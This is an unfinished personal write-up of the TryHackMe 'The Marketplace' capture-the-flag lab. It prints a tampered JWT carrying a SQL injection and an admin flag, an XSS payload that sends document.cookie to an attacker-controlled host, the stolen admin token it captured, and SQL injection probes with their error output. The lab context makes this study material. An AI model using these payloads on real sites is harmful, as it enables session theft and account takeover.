The Marketplace – writeup tryhackme

The Marketplace writeup tryhackme

jwt token found
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOmZhbHNlLCJpYXQiOjE2MDMxODQzNzB9.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY

decoded its:
{"alg":"HS256","typ":"JWT"}
{"userId":1,"username":"michael' or 1=1","admin":true,"iat":1603184370}
eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0=
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInVzZXJuYW1lIjoibWljaGFlbCcgb3IgMT0xIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0K.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY

ok since i found an reflected xss and there was an ability to report stuff to admins which are automatically responded to by an admin account, we can steal their cookies. i’m running a cookie stealer and injected

">var+i=new+Image;i.src="http://ip:8888/?"+document.cookie;

as an new item into the page and my stealer got loot:

kali@kali:~/tools$ python cookiestealer.py
Started http server

2020-10-20 05:43 AM - 10.10.78.239 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/85.0.4182.0 Safari/537.36
token ['eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MDMxODcwMDl9.V_7aVbdmO7438VdqJiIkczotl0TljZupDQvaQwhNy5o']

that got the first flag :) THM{xxx}

sqli found in http://10.10.8.75/xxx

%3b%20execute%20immediate%20'sel'%20%7c%7c%20'ect%20us'%20%7c%7c%20'er'
<h2>Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;; execute immediate &#39;sel&#39; || &#39;ect us&#39; || &#39;er&#39;&#39; at line 1</h2>
HTTP/1.1 500 Internal Server Error
Server: nginx/1.19.2
Date: Sat, 24 Oct 2020 18:18:12 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 757
Connection: close
X-Powered-By: Express
ETag: W/"2f5-drQF/DLtuZWnrPXCr3lYSPJxZX0"
Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

gotta exploit it… TBC

Leave a Comment